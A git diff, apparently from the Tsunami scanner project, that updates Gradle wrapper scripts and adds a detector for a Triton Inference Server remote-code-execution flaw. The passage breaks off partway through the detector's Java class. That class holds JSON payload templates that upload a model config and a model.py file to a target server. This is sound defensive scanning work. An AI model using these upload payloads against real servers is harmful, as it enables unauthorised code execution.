ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/community/detectors/spring_framework_cve_2022_22965/gradlew.bat b/community/detectors/spring_framework_cve_2022_22965/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/community/detectors/spring_framework_cve_2022_22965/gradlew.bat +++ b/community/detectors/spring_framework_cve_2022_22965/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/community/detectors/strapi_cve_2023_22893/gradle/wrapper/gradle-wrapper.properties b/community/detectors/strapi_cve_2023_22893/gradle/wrapper/gradle-wrapper.properties index 8f9797cb5..d04736436 100644 --- a/community/detectors/strapi_cve_2023_22893/gradle/wrapper/gradle-wrapper.properties +++ b/community/detectors/strapi_cve_2023_22893/gradle/wrapper/gradle-wrapper.properties @@ -1,6 +1,6 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip networkTimeout=10000 validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME diff --git a/community/detectors/triton_inference_server_model_overwrite/README.md b/community/detectors/triton_inference_server_model_overwrite/README.md new file mode 100644 index 000000000..3b6c0052f --- /dev/null +++ b/community/detectors/triton_inference_server_model_overwrite/README.md 
@@ -0,0 +1,21 @@
+# Triton Inference Server Rce Detector
+
+This detector checks triton inference server RCE with explicit model-control
+option enabled. All versions of triton inference server with the
+`--model-control explicit` option and at least one loaded model can be
+overwritten by a malicious model and lead to RCE. As a recommendation don't use
+`--model-control explicit` option with public access.
+
+Ref:
+
+- https://protectai.com/threat-research/triton-inference-server-arbitrary-file-overwrite
+
+## Build jar file for this plugin
+
+Using `gradlew`:
+
+```shell
+./gradlew jar
+```
+
+Tsunami identifiable jar file is located at `build/libs` directory.
diff --git a/community/detectors/triton_inference_server_model_overwrite/build.gradle b/community/detectors/triton_inference_server_model_overwrite/build.gradle
new file mode 100644
index 000000000..96f7b3f12
--- /dev/null
+++ b/community/detectors/triton_inference_server_model_overwrite/build.gradle
@@ -0,0 +1,69 @@
+plugins {
+ id 'java-library'
+}
+
+description = 'Tsunami Triton Inference Server Rce Detector VulnDetector plugin.'
+group = 'com.google.tsunami'
+version = '0.0.1-SNAPSHOT'
+
+repositories {
+ maven { // The google mirror is less flaky than mavenCentral()
+ url 'https://maven-central.storage-download.googleapis.com/repos/central/data/'
+ }
+ mavenCentral()
+ mavenLocal()
+}
+
+java {
+ sourceCompatibility = JavaVersion.VERSION_11
+ targetCompatibility = JavaVersion.VERSION_11
+
+ jar.manifest {
+ attributes('Implementation-Title': name,
+ 'Implementation-Version': version,
+ 'Built-By': System.getProperty('user.name'),
+ 'Built-JDK': System.getProperty('java.version'),
+ 'Source-Compatibility': sourceCompatibility,
+ 'Target-Compatibility': targetCompatibility)
+ }
+
+ javadoc.options {
+ encoding = 'UTF-8'
+ use = true
+ links 'https://docs.oracle.com/en/java/javase/11/'
+ source = '11'
+ }
+
+ // Log stacktrace to console when test fails.
+ test {
+ testLogging {
+ exceptionFormat = 'full'
+ showExceptions true
+ showCauses true
+ showStackTraces true
+ }
+ maxHeapSize = '1500m'
+ }
+}
+
+ext {
+ tsunamiVersion = 'latest.release'
+ junitVersion = '4.13'
+ mockitoVersion = '2.28.2'
+ okhttpVersion = '3.12.0'
+ truthVersion = '1.1.3'
+}
+
+dependencies {
+ implementation "com.google.tsunami:tsunami-common:${tsunamiVersion}"
+ implementation "com.google.tsunami:tsunami-plugin:${tsunamiVersion}"
+ implementation "com.google.tsunami:tsunami-proto:${tsunamiVersion}"
+ implementation 'com.google.code.gson:gson:2.10.1'
+
+ testImplementation "junit:junit:${junitVersion}"
+ testImplementation "org.mockito:mockito-core:${mockitoVersion}"
+ testImplementation "com.google.truth:truth:${truthVersion}"
+ testImplementation "com.squareup.okhttp3:mockwebserver:${okhttpVersion}"
+ testImplementation "com.google.truth.extensions:truth-java8-extension:${truthVersion}"
+ testImplementation "com.google.truth.extensions:truth-proto-extension:${truthVersion}"
+}
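Review bot: `tsunamiVersion = 'latest.release'` in the `ext` block makes all three `com.google.tsunami` dependencies resolve to whatever version is newest at build time, and `mavenLocal()` is one of the repositories searched, so two builds of the same commit can put different code into a jar that runs inside the scanner. Pin the version, e.g. `tsunamiVersion = '<PINNED_TSUNAMI_VERSION>'` (placeholder; use the release the plugin was tested against), and keep `mavenLocal()` only if the build really depends on locally published Tsunami artifacts, which cannot be told from this hunk. Separately, `'Built-By': System.getProperty('user.name')` writes the builder's account name into the jar manifest; consider dropping that attribute for artifacts that are distributed.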
diff --git a/community/detectors/triton_inference_server_model_overwrite/gradle/wrapper/gradle-wrapper.jar b/community/detectors/triton_inference_server_model_overwrite/gradle/wrapper/gradle-wrapper.jar new file mode 100644 index 000000000..d64cd4917 Binary files /dev/null and b/community/detectors/triton_inference_server_model_overwrite/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/triton_inference_server_model_overwrite/gradle/wrapper/gradle-wrapper.properties b/community/detectors/triton_inference_server_model_overwrite/gradle/wrapper/gradle-wrapper.properties new file mode 100644 index 000000000..d04736436 --- /dev/null +++ b/community/detectors/triton_inference_server_model_overwrite/gradle/wrapper/gradle-wrapper.properties @@ -0,0 +1,7 @@ +distributionBase=GRADLE_USER_HOME +distributionPath=wrapper/dists +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true +zipStoreBase=GRADLE_USER_HOME +zipStorePath=wrapper/dists diff --git a/community/detectors/triton_inference_server_model_overwrite/gradlew b/community/detectors/triton_inference_server_model_overwrite/gradlew new file mode 100755 index 000000000..1aa94a426 --- /dev/null +++ b/community/detectors/triton_inference_server_model_overwrite/gradlew 
@@ -0,0 +1,249 @@ +#!/bin/sh + +# +# Copyright © 2015-2021 the original authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# + +############################################################################## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. 
+# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# +############################################################################## + +# Attempt to set APP_HOME + +# Resolve links: $0 may be a link +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac +done + +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit + +# Use the maximum available, or set MAX_FD != -1 to use that value. +MAX_FD=maximum + +warn () { + echo "$*" +} >&2 + +die () { + echo + echo "$*" + echo + exit 1 +} >&2 + +# OS specific support (must be 'true' or 'false'). +cygwin=false +msys=false +darwin=false +nonstop=false +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; +esac + +CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar + + +# Determine the Java command to use to start the JVM. 
+if [ -n "$JAVA_HOME" ] ; then + if [ -x "$JAVA_HOME/jre/sh/java" ] ; then + # IBM's JDK on AIX uses strange locations for the executables + JAVACMD=$JAVA_HOME/jre/sh/java + else + JAVACMD=$JAVA_HOME/bin/java + fi + if [ ! -x "$JAVACMD" ] ; then + die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +else + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +fi + +# Increase the maximum file descriptors if we can. +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac +fi + +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. 
+ +# For Cygwin or MSYS, switch paths to Windows format before running java +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + + # Now convert the arguments - kludge to limit ourselves to /bin/sh + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) + fi + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg + done +fi + + +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. 
+# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' + +exec "$JAVACMD" "$@" diff --git a/community/detectors/triton_inference_server_model_overwrite/gradlew.bat b/community/detectors/triton_inference_server_model_overwrite/gradlew.bat new file mode 100644 index 000000000..93e3f59f1 --- /dev/null +++ b/community/detectors/triton_inference_server_model_overwrite/gradlew.bat 
@@ -0,0 +1,92 @@ +@rem +@rem Copyright 2015 the original author or authors. +@rem +@rem Licensed under the Apache License, Version 2.0 (the "License"); +@rem you may not use this file except in compliance with the License. +@rem You may obtain a copy of the License at +@rem +@rem https://www.apache.org/licenses/LICENSE-2.0 +@rem +@rem Unless required by applicable law or agreed to in writing, software +@rem distributed under the License is distributed on an "AS IS" BASIS, +@rem WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +@rem See the License for the specific language governing permissions and +@rem limitations under the License. +@rem + +@if "%DEBUG%"=="" @echo off +@rem ########################################################################## +@rem +@rem Gradle startup script for Windows +@rem +@rem ########################################################################## + +@rem Set local scope for the variables with windows NT shell +if "%OS%"=="Windows_NT" setlocal + +set DIRNAME=%~dp0 +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused +set APP_BASE_NAME=%~n0 +set APP_HOME=%DIRNAME% + +@rem Resolve any "." and ".." in APP_HOME to make it shorter. +for %%i in ("%APP_HOME%") do set APP_HOME=%%~fi + +@rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +set DEFAULT_JVM_OPTS="-Xmx64m" "-Xms64m" + +@rem Find java.exe +if defined JAVA_HOME goto findJavaFromJavaHome + +set JAVA_EXE=java.exe +%JAVA_EXE% -version >NUL 2>&1 +if %ERRORLEVEL% equ 0 goto execute + +echo. +echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. +echo. +echo Please set the JAVA_HOME variable in your environment to match the +echo location of your Java installation. + +goto fail + +:findJavaFromJavaHome +set JAVA_HOME=%JAVA_HOME:"=% +set JAVA_EXE=%JAVA_HOME%/bin/java.exe + +if exist "%JAVA_EXE%" goto execute + +echo. 
+echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% +echo. +echo Please set the JAVA_HOME variable in your environment to match the +echo location of your Java installation. + +goto fail + +:execute +@rem Setup the command line + +set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar + + +@rem Execute Gradle +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* + +:end +@rem End local scope for the variables with windows NT shell +if %ERRORLEVEL% equ 0 goto mainEnd + +:fail +rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of +rem the _cmd.exe /c_ return code! +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% + +:mainEnd +if "%OS%"=="Windows_NT" endlocal + +:omega diff --git a/community/detectors/triton_inference_server_model_overwrite/settings.gradle b/community/detectors/triton_inference_server_model_overwrite/settings.gradle new file mode 100644 index 000000000..2506d8d59 --- /dev/null +++ b/community/detectors/triton_inference_server_model_overwrite/settings.gradle @@ -0,0 +1 @@ +rootProject.name = 'triton-inference-server-model-overwrite' diff --git a/community/detectors/triton_inference_server_model_overwrite/src/main/java/com/google/tsunami/plugins/detectors/rce/TritonInferenceServerRceDetectorBootstrapModule.java b/community/detectors/triton_inference_server_model_overwrite/src/main/java/com/google/tsunami/plugins/detectors/rce/TritonInferenceServerRceDetectorBootstrapModule.java new file mode 100644 index 000000000..eeab8dd11 --- /dev/null +++ b/community/detectors/triton_inference_server_model_overwrite/src/main/java/com/google/tsunami/plugins/detectors/rce/TritonInferenceServerRceDetectorBootstrapModule.java 
@@ -0,0 +1,30 @@
+/*
+ * Copyright 2024 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.google.tsunami.plugins.detectors.rce;
+
+import com.google.tsunami.plugin.PluginBootstrapModule;
+
+/**
+ * A Triton Inference Server Rce Detector Guice module that bootstraps the {@link
+ * TritonInferenceServerRceVulnDetector}.
+ */
+public final class TritonInferenceServerRceDetectorBootstrapModule extends PluginBootstrapModule {
+
+ @Override
+ protected void configurePlugin() {
+ registerPlugin(TritonInferenceServerRceVulnDetector.class);
+ }
+}
diff --git a/community/detectors/triton_inference_server_model_overwrite/src/main/java/com/google/tsunami/plugins/detectors/rce/TritonInferenceServerRceVulnDetector.java b/community/detectors/triton_inference_server_model_overwrite/src/main/java/com/google/tsunami/plugins/detectors/rce/TritonInferenceServerRceVulnDetector.java
new file mode 100644
index 000000000..d7187f627
--- /dev/null
+++ b/community/detectors/triton_inference_server_model_overwrite/src/main/java/com/google/tsunami/plugins/detectors/rce/TritonInferenceServerRceVulnDetector.java
@@ -0,0 +1,303 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package com.google.tsunami.plugins.detectors.rce; + +import static com.google.common.base.Preconditions.checkNotNull; +import static com.google.common.collect.ImmutableList.toImmutableList; +import static com.google.common.net.HttpHeaders.CONTENT_TYPE; +import static com.google.tsunami.common.data.NetworkServiceUtils.buildWebApplicationRootUrl; +import static com.google.tsunami.common.net.http.HttpRequest.post; + +import com.google.common.annotations.VisibleForTesting; +import com.google.common.collect.ImmutableList; +import com.google.common.flogger.GoogleLogger; +import com.google.gson.JsonArray; +import com.google.gson.JsonElement; +import com.google.gson.JsonObject; +import com.google.gson.JsonParser; +import com.google.protobuf.ByteString; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.net.http.HttpClient; +import com.google.tsunami.common.net.http.HttpHeaders; +import com.google.tsunami.common.net.http.HttpResponse; +import com.google.tsunami.common.time.UtcClock; +import com.google.tsunami.plugin.PluginType; +import com.google.tsunami.plugin.VulnDetector; +import com.google.tsunami.plugin.annotations.ForWebService; +import com.google.tsunami.plugin.annotations.PluginInfo; +import com.google.tsunami.plugin.payload.NotImplementedException; +import com.google.tsunami.plugin.payload.Payload; +import 
com.google.tsunami.plugin.payload.PayloadGenerator; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.PayloadGeneratorConfig; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.IOException; +import java.time.Clock; +import java.time.Instant; +import java.util.Base64; +import javax.inject.Inject; + +/** A {@link VulnDetector} that detects the triton inference server RCE vulnerability. */ +@ForWebService +@PluginInfo( + type = PluginType.VULN_DETECTION, + name = "TritonInferenceServerRceVulnDetector", + version = "0.1", + description = + "This detector checks triton inference server RCE with explicit model-control option" + + " enabled", + author = "secureness", + bootstrapModule = TritonInferenceServerRceDetectorBootstrapModule.class) +public class TritonInferenceServerRceVulnDetector implements VulnDetector { + + private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); + + @VisibleForTesting + static final String UPLOAD_CONFIG_PAYLOAD = + "{\"parameters\":{\"config\" : \"{}\", \"file:config.pbtxt\" :\"%s\" }}"; + + @VisibleForTesting + static final String UPLOAD_MODEL_PAYLOAD = + "{\"parameters\":{\"config\" : \"{}\", \"file:1/model.py\" : \"%s\" }}"; + + private final PayloadGenerator payloadGenerator; + + @VisibleForTesting + static final String MODEL_CONFIG = + "\n" + + "name: \"%s\"\n" + + "backend: \"python\"\n" + + "\n" + + "input [\n" + + " {\n" + + " name: \"input__0\"\n" + + " data_type: TYPE_FP32\n" + + " dims: [ -1, 3 ]\n" + + " }\n" + + "]\n" + + "\n" + + "output [\n" + + " {\n" + + " name: \"output__0\"\n" + + " data_type: TYPE_FP32\n" + + " dims: [ -1, 1 ]\n" + + " }\n" + + "]\n" + + "\n" + + 
